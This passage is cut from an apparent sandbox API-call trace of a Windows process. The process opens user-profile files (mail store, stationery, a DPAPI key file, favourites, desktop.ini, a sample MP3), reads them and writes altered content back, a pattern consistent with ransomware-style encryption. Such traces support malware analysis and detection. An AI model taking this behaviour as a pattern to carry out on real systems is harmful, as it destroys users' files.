lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0183.115] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x204000 [0183.115] ReadFile (in: hFile=0x1dc, lpBuffer=0x2885de8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2885de8*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0183.123] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x204000 [0183.124] WriteFile (in: hFile=0x1dc, lpBuffer=0x3d1bb28*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3d1bb28*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0183.125] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0183.125] WriteFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0183.126] WriteFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0183.126] WriteFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2d5f28c*=0x2000, lpOverlapped=0x0) returned 1 [0183.126] CloseHandle (hObject=0x1dc) returned 1 [0183.127] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.128] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.128] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xed [0183.128] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.128] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.128] ReleaseMutex (hMutex=0x168) returned 1 [0183.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0183.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Green Bubbles.htm", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Green Bubbles.htm", lpUsedDefaultChar=0x0) returned 17 [0183.128] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x2d5f2bc*=0xed, lpOverlapped=0x0) returned 1 [0183.129] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0183.129] WriteFile (in: hFile=0x1dc, lpBuffer=0x28fca08*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fca08*, lpNumberOfBytesWritten=0x2d5f2d0*=0x675, lpOverlapped=0x0) returned 1 [0183.129] CloseHandle (hObject=0x1dc) returned 1 [0183.129] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.130] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.130] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x204000 [0183.130] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.130] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.130] ReleaseMutex (hMutex=0x168) returned 1 [0183.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0183.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x1f8fc6c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMail.MSMessageStore", lpUsedDefaultChar=0x0) returned 26 [0183.130] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0183.162] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0183.163] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0183.164] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x202000 [0183.164] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b2008, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26b2008*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0183.167] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x202000 [0183.168] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ab708*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab708*, lpNumberOfBytesWritten=0x2d5f28c*=0x2588, lpOverlapped=0x0) returned 1 [0183.169] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0183.169] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0183.170] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0183.170] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x2000, lpOverlapped=0x0) returned 1 [0183.170] CloseHandle (hObject=0x1dc) returned 1 [0183.171] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.171] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.171] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x18 [0183.172] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.172] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.172] ReleaseMutex (hMutex=0x168) returned 1 [0183.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferred", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0183.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferred", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Preferred", lpUsedDefaultChar=0x0) returned 9 [0183.172] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f88b28, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88b28*, lpNumberOfBytesRead=0x2d5f2bc*=0x18, lpOverlapped=0x0) returned 1 [0183.173] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0183.173] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a0, lpOverlapped=0x0) returned 1 [0183.174] CloseHandle (hObject=0x1dc) returned 1 [0183.174] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xe2 [0183.175] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.175] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.175] ReleaseMutex (hMutex=0x168) returned 1 [0183.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0183.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Slice Gallery.url", lpUsedDefaultChar=0x0) returned 21 [0183.175] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c49b8, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c49b8*, lpNumberOfBytesRead=0x2d5f2bc*=0xe2, lpOverlapped=0x0) returned 1 [0183.176] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0183.176] WriteFile (in: hFile=0x1dc, lpBuffer=0x28fca08*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fca08*, lpNumberOfBytesWritten=0x2d5f2d0*=0x66a, lpOverlapped=0x0) returned 1 [0183.176] CloseHandle (hObject=0x1dc) returned 1 [0183.177] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.177] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.177] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x85 [0183.178] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.178] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.178] ReleaseMutex (hMutex=0x168) returned 1 [0183.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0183.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Money.url", lpUsedDefaultChar=0x0) returned 13 [0183.178] ReadFile (in: hFile=0x1dc, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x2d5f2bc*=0x85, lpOverlapped=0x0) returned 1 [0183.179] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0183.179] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0183.179] CloseHandle (hObject=0x1dc) returned 1 [0183.180] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.180] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.180] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x244 [0183.180] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.180] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.181] ReleaseMutex (hMutex=0x168) returned 1 [0183.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.181] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2d5f2bc*=0x244, lpOverlapped=0x0) returned 1 [0183.182] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0183.182] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x7cc, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2d5f2d0*=0x7cc, lpOverlapped=0x0) returned 1 [0183.182] CloseHandle (hObject=0x1dc) returned 1 [0183.182] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.184] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.184] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x20c [0183.184] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.184] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.184] ReleaseMutex (hMutex=0x168) returned 1 [0183.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.184] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x20c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x2d5f2bc*=0x20c, lpOverlapped=0x0) returned 1 [0183.185] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0183.185] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x794, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2d5f2d0*=0x794, lpOverlapped=0x0) returned 1 [0183.185] CloseHandle (hObject=0x1dc) returned 1 [0183.186] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x116 [0183.186] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0183.186] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.186] ReleaseMutex (hMutex=0x168) returned 1 [0183.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0183.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0183.186] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ec89c8, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec89c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x116, lpOverlapped=0x0) returned 1 [0183.187] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0183.187] WriteFile (in: hFile=0x1dc, lpBuffer=0x28fca08*, nNumberOfBytesToWrite=0x69e, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28fca08*, lpNumberOfBytesWritten=0x2d5f2d0*=0x69e, lpOverlapped=0x0) returned 1 [0183.188] CloseHandle (hObject=0x1dc) returned 1 [0183.188] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0183.188] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0184.181] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x49e459 [0184.181] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0184.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0184.182] ReleaseMutex (hMutex=0x168) returned 1 [0184.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sleep Away.mp3", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0184.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sleep Away.mp3", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sleep Away.mp3", lpUsedDefaultChar=0x0) returned 14 [0184.182] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0184.185] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0184.190] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x2000, lpOverlapped=0x0) returned 1 [0184.986] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2d5f2e8*=-1, 